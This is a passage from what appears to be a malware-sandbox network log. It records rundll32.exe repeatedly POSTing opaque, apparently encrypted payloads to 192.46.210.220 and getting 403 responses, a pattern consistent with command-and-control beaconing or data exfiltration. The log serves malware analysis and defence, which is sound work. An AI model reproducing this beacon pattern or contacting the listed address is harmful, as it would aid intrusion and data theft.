                                                                                                      2021-10-28 02:54:32 UTC35OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:32 UTC39INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:32 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      70192.168.2.750097192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:40 UTC349OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:40 UTC349OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:41 UTC354INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:41 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      71192.168.2.750103192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:43 UTC354OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:43 UTC354OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:44 UTC359INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:44 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      72192.168.2.750105192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:44 UTC359OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:44 UTC359OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:45 UTC364INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:45 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      73192.168.2.750111192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:47 UTC364OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:47 UTC364OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:48 UTC369INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:48 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      74192.168.2.750113192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:48 UTC369OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:48 UTC369OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:49 UTC374INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:49 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      75192.168.2.750119192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:51 UTC374OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:51 UTC374OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:52 UTC379INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:51 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      76192.168.2.750121192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:52 UTC379OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:52 UTC379OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:53 UTC384INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:53 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      77192.168.2.750127192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:57 UTC384OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:57 UTC384OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:57 UTC389INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:57 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      78192.168.2.750129192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:58 UTC389OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:58 UTC389OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:58 UTC394INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:58 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      79192.168.2.750135192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:57:00 UTC394OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:57:00 UTC394OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:57:01 UTC399INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:57:01 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      8192.168.2.749761192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:34 UTC39OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:34 UTC40OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:35 UTC44INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:35 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      80192.168.2.750137192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:57:01 UTC399OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:57:01 UTC399OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:57:02 UTC404INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:57:02 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      81192.168.2.750143192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:57:04 UTC404OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
